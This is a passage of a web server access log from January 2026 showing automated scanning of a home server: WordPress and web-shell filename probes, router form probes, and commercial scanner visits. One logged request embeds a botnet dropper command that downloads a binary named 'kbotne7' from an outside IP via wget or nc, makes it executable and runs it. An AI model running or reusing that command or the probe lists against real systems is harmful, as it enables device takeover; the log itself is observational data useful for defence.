profibot.direct.quickconnect.to "/shlo.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/133.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/php8.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix1.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/witmm.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/index.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-editor.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/txets.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/txets.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/txets.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/postnews.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/postnews.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/postnews.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:27:20 +0000] 400 - GET http 92.249.249.197 "/" [Client 92.63.197.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[11/Jan/2026:23:31:22 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.114] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[11/Jan/2026:23:32:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.45] [Length 568] [Gzip 1.86] "Linux Gnu (cow)" "-" +[11/Jan/2026:23:35:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[11/Jan/2026:23:39:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[11/Jan/2026:23:42:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:00:01:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:00:05:45 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[12/Jan/2026:00:15:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 93.170.123.207] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" "-" +[12/Jan/2026:00:22:51 +0000] 400 - GET http 92.249.249.197 "/" [Client 66.228.53.4] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:00:27:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:00:32:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:00:33:09 +0000] 400 - GET http 92.249.249.197 "/" [Client 81.29.142.100] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 YaBrowser/20.8.2.92 Yowser/2.5 Safari/537.36" "-" +[12/Jan/2026:00:33:23 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.33.12.122] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:00:53:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:01:00:03 +0000] 404 - POST http 92.249.249.197 "/cgi-bin/php/login_check.php" [Client 79.133.126.183] [Length 150] [Gzip -] "Hello World" "-" +[12/Jan/2026:01:10:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" +[12/Jan/2026:01:10:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:01:18:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:01:22:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 142.93.135.160] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:01:24:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:01:35:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.227.100.25] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:01:35:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.227.100.25] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:01:35:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 64.227.100.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:01:35:25 +0000] 404 - GET http 92.249.249.197 "/form.html" [Client 64.227.100.25] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[12/Jan/2026:01:35:25 +0000] 404 - GET http 92.249.249.197 "/upl.php" [Client 64.227.100.25] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[12/Jan/2026:01:35:26 +0000] 404 - GET http 92.249.249.197 "/t4" [Client 64.227.100.25] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[12/Jan/2026:01:35:26 +0000] 404 - GET http 92.249.249.197 "/geoip/" [Client 64.227.100.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:01:35:27 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:01:35:28 +0000] 404 - GET http 92.249.249.197 "/1.php" [Client 64.227.100.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:01:35:28 +0000] 404 - GET http 92.249.249.197 "/systembc/password.php" [Client 64.227.100.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:01:35:28 +0000] 404 - GET http 92.249.249.197 "/password.php" [Client 64.227.100.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:01:38:00 +0000] 404 - GET http 92.249.249.197 "/shell?cd+/tmp+||+cd+/var/tmp;rm+-rf+kbotne7;wget+-q+-O+kbotne7+http:/\x5C/2.56.245.78/lala/kbotne7+||+busybox+wget+-q+-O+kbotne7+http:/\x5C/2.56.245.78/lala/kbotne7+||+nc+2.56.245.78+1007+>+kbotne7+||+toybox+nc+2.56.245.78+1007+>+kbotne7;chmod+777+kbotne7+||+chmod+x+kbotne7;./kbotne7+jaws" [Client 79.133.126.183] [Length 122] [Gzip 1.35] "KrebsOnSecurity" "-" +[12/Jan/2026:01:41:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:01:42:59 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 45.94.31.58] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:42:59 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 45.94.31.58] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:42:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php?rsd" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:00 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 45.94.31.58] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/web/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/website/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/news/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/test/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/media/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/site/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[12/Jan/2026:01:43:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.94.31.58] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:01:44:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 79.133.126.183] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[12/Jan/2026:01:44:07 +0000] 405 - PROPFIND http 92.249.249.197 "/" [Client 79.133.126.183] [Length 154] [Gzip -] "-" "http://92.249.249.197:80/" +[12/Jan/2026:01:44:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:01:45:15 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" +[12/Jan/2026:02:07:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:02:14:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:02:31:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:02:45:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:02:46:26 +0000] 400 - POST http 92.249.249.197 "/" [Client 87.121.84.129] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:02:54:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:02:57:08 +0000] 400 - - http localhost "-" [Client 3.149.59.26] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:02:57:32 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.149.59.26] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[12/Jan/2026:03:00:16 +0000] 400 - - http localhost "-" [Client 3.149.59.26] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:03:08:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:03:18:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[12/Jan/2026:03:22:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:03:30:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.100.11.243] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:03:32:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:03:37:26 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:03:44:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:03:58:43 +0000] 404 - GET http 92.249.249.197 "/hudson" [Client 40.124.175.225] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:04:03:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.14.90.54] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:04:03:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:04:05:54 +0000] 404 - GET http 92.249.249.197 "/ReportServer" [Client 40.124.174.209] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:04:11:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:04:11:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:04:12:01 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:04:15:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:04:34:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:04:35:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[12/Jan/2026:05:00:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:05:01:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:05:16:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.143.33.63] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[12/Jan/2026:05:17:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:17:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:19:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.105] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:19:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.105] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:19:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:05:21:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rymmm.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws34.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws45.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xxw.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws33.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lm13.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws38.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:07 +0000] 404 - GET http 